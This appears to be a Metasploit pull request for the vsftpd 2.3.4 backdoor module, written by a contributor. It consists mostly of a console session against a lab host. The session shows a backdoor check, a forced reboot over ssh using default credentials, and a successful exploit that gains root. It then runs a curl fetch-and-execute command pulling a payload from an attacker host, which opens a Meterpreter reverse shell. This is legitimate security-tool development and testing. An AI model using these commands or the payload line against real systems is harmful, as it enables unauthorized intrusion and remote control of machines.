vsftpd_234_backdoor: Improve single shot backdoor handling

[g0tmi1k]

This PR is for:

• Make more success when repeating the check/exploiting more.
• Update wording
• Update metadata (notes)

After

[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: OYGIkFxA.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
msf >
msf > git checkout vsftpd_234_backdoor
[*] exec: git checkout vsftpd_234_backdoor

Already on 'vsftpd_234_backdoor'
Your branch is up to date with 'origin/vsftpd_234_backdoor'.
msf >
msf > use vsftpd_234_backdoor

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  Yes    VSFTPD 2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

[*] Using exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/linux/http/x86/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           tap0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      scWYMbcGl        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > check
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[-] 10.0.0.10:21 - The port used by the backdoor bind listener is already open/in-use (6200/TCP)
[*] 10.0.0.10:21 - Cannot reliably check exploitability. Backdoor bind listener port 6200 is already open
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > ssh1 msfadmin@10.0.0.10 sudo reboot -f
[*] exec: ssh1 msfadmin@10.0.0.10 sudo reboot -f

/etc/ssh/ssh_config line 52: Unsupported option "gssapiauthentication"
msfadmin@10.0.0.10's password:
[sudo] password for msfadmin: msfadmin

packet_write_wait: Connection to 10.0.0.10 port 22: Broken pipe
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > check
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: 2wF7)
[*] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] Command to run on remote host: curl -so ./VyZFRFPLiW http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./VyZFRFPLiW;./VyZFRFPLiW&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w5F5mvQl1V5uSRj-6oaPrQ
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: M)
[+] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: KZG6g1:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: F
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: curl -so ./VyZFRFPLiW http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./VyZFRFPLiW;./VyZFRFPLiW&
[*] Client 10.0.0.10 requested /w5F5mvQl1V5uSRj-6oaPrQ
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:35162) at 2026-04-26 21:28:40 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      1

msf exploit(unix/ftp/vsftpd_234_backdoor) >

[g0tmi1k]

This now needs #21380 to be merged ahead of time.